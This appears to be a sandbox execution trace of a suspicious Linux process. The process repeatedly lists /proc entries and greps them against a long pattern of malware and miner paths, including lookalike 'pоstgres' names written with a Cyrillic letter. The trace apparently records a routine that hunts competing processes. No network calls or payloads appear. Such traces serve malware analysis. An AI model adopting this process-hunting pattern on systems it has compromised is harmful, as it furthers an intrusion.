/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1074
-
-
/bin/grepgrep exe2⤵PID:1078
-
-
/bin/lsls -latrh /proc/7332⤵PID:1077
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1080
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/lsls -latrh /proc/7342⤵PID:1084
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1089
-
-
/bin/grepgrep exe2⤵PID:1092
-
-
/bin/lsls -latrh /proc/7352⤵PID:1091
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1094
-
-
/bin/grepgrep exe2⤵PID:1097
-
-
/bin/lsls -latrh /proc/7382⤵PID:1096
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1100
-
-
/bin/grepgrep exe2⤵PID:1103
-
-
/bin/lsls -latrh /proc/742⤵PID:1102
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1105
-
-
/bin/grepgrep exe2⤵PID:1108
-
-
/bin/lsls -latrh /proc/7442⤵PID:1107
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1110
-
-
/bin/grepgrep exe2⤵PID:1113
-
-
/bin/lsls -latrh /proc/7452⤵PID:1112
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1115
-
-
/bin/grepgrep exe2⤵PID:1118
-
-
/bin/lsls -latrh /proc/752⤵PID:1117
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1120
-
-
/bin/grepgrep exe2⤵PID:1123
-
-
/bin/lsls -latrh /proc/7592⤵PID:1122
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1125
-
-
/bin/grepgrep exe2⤵PID:1128
-
-
/bin/lsls -latrh /proc/762⤵PID:1127
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1130
-
-
/bin/grepgrep exe2⤵PID:1133
-
-
/bin/lsls -latrh /proc/772⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1135
-
-
/bin/grepgrep exe2⤵PID:1138
-
-
/bin/lsls -latrh /proc/782⤵PID:1137
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1140
-
-
/bin/grepgrep exe2⤵PID:1143
-
-
/bin/lsls -latrh /proc/82⤵PID:1142
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1145
-
-
/bin/grepgrep exe2⤵PID:1148
-
-
/bin/lsls -latrh /proc/812⤵PID:1147
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1150
-
-
/bin/grepgrep exe2⤵PID:1153
-
-
/bin/lsls -latrh /proc/822⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1155
-
-
/bin/grepgrep exe2⤵PID:1158
-
-
/bin/lsls -latrh /proc/92⤵PID:1157
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1160
-
-
/bin/grepgrep exe2⤵PID:1163
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1162
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1165
-
-
/bin/grepgrep exe2⤵PID:1168
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1167
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1170
-
-
/bin/grepgrep exe2⤵PID:1173
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1172
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1175
-
-
/bin/grepgrep exe2⤵PID:1178
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1177
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1180
-
-
/bin/grepgrep exe2⤵PID:1183
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1182
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1185
-
-
/bin/grepgrep exe2⤵PID:1188
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1187
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1190
-
-
/bin/grepgrep exe2⤵PID:1193
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1192
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1195
-
-
/bin/grepgrep exe2⤵PID:1198
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1197
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1200
-
-
/bin/grepgrep exe2⤵PID:1203
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1202
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1205
-
-
/bin/grepgrep exe2⤵PID:1208
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1207
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1210
-
-
/bin/grepgrep exe2⤵PID:1213
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1212
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1215
-
-
/bin/grepgrep exe2⤵PID:1218
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1217
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1223
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1222
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1225
-
-
/bin/grepgrep exe2⤵PID:1228
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1227
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1230
-
-
/bin/grepgrep exe2⤵PID:1233
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1232
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1235
-
-
/bin/grepgrep exe2⤵PID:1238
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1237
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1245
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1244
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1248
-
-
/bin/grepgrep exe2⤵PID:1252
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1251
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1254
-
-
/bin/grepgrep exe2⤵PID:1258
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1257
-
-
